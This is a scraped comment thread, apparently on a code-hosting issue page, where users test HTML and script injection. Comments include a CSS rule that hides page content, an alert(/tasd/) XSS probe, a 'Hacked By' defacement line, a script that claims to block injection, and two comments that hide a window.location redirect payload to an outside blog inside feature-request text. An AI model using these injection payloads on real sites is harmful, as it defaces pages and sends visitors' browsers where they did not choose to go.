米斯特安全

zx775337791 commented 7 months ago

Tea img,svg,table{visibility: collapse;}

kevindragong commented 7 months ago

are you zhaoxu?

| 974297362 commented 7 months ago

are you zhaoxu?

| ntyangyang commented 7 months ago

are you zhaoxu?

| ww3651425 commented 7 months ago

are you zhaoxu?

| mirsQian commented 7 months ago

are you zhaoxu?

| alightman commented 7 months ago

are you zhaoxu?

CoatiFly commented 7 months ago

are you zhaoxu?

keepzouba commented 7 months ago

这不是tm相当于实名举报了，厉害

sf197 commented 7 months ago

alert(/tasd/)

xss67612 commented 7 months ago

Hacked By Helen收徒QQ925999918

superzmy commented 7 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

反注入补丁 <script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

itongqingbo commented 7 months ago

怎么反注入

itongqingbo commented 7 months ago

my test commit

itongqingbo commented 7 months ago

122

itongqingbo commented 7 months ago

test repeat sent b

q8195438 commented 7 months ago

for (var i=0;i

guotao commented 6 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。。

guotao commented 6 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。反注入补丁

Other features